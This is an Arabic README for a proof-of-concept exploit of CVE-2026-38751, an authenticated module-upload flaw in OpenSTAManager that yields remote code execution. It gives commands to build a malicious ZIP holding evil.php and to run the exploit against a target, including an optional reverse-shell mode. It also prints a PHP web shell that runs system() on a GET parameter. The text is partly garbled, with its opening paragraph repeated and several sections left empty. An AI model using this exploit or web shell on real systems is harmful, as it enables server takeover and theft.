
يحتوي هذا المستودع على استغلال لإثبات المفهوم (PoC) لـ CVE-2026-38751، والذي يؤثر على OpenSTAManager ≤ 2.10. تسمح الثغرة للمهاجم المُوثَّق بتحميل وحدة ضارة عبر وظيفة تحديث الوحدة، مما يؤدي إلى تحميل ملف عشوائي وتنفيذ تعليمات برمجية عن بُعد (RCE).
يحتوي هذا المستودع على استغلال إثبات المفهوم (PoC) لـ CVE-2026-38751، والذي يؤثر على OpenSTAManager ≤ 2.10. تسمح الثغرة لمهاجم مصادق برفع وحدة ضارة عبر وظيفة تحديث الوحدة، مما يؤدي إلى رفع ملف تعسفي وتنفيذ تعليمات برمجية عن بُعد (RCE).
modules/aggiornamenti/upload_modules.php)تتيح وظيفة تحديث الوحدة للمستخدمين المصادقين رفع وحدات قائمة على ZIP دون التحقق السليم من محتويات الملف أو حدود التنفيذ. يمكن للمهاجم صياغة وحدة ضارة تحتوي على حمولات PHP، والتي يتم نشرها بعد ذلك في جذر الويب وتنفيذها عبر سياق التطبيق. يؤدي هذا إلى:
##التأثير يسمح الاستغلال الناجح بما يلي:
python exploit.py --build
ينشئ:
update.zip
└── run/
├── MODULE
└── evil.php
python exploit.py <username> <password> <target_url>
وضع الصدفة العكسية اختياري:
python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>
مثال على الحمولة
<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>
إذا نجحت، يقوم نقطة النهاية التالية بتنفيذ أوامر النظام:
/modules/run/evil.php?cmd=id
هذا المشروع مخصص لـ:
لا تستخدم ضد أنظمة دون إذن صريح.
ملاحظات
قد يختلف الكشف حسب تكوين الخادم. قد تقوم بعض النشرات بتعطيل تنفيذ PHP المباشر في أدلة الوحدات. قد يتطلب توقيت تنشيط الوحدة إعادة محاولات.
شكر وتقدير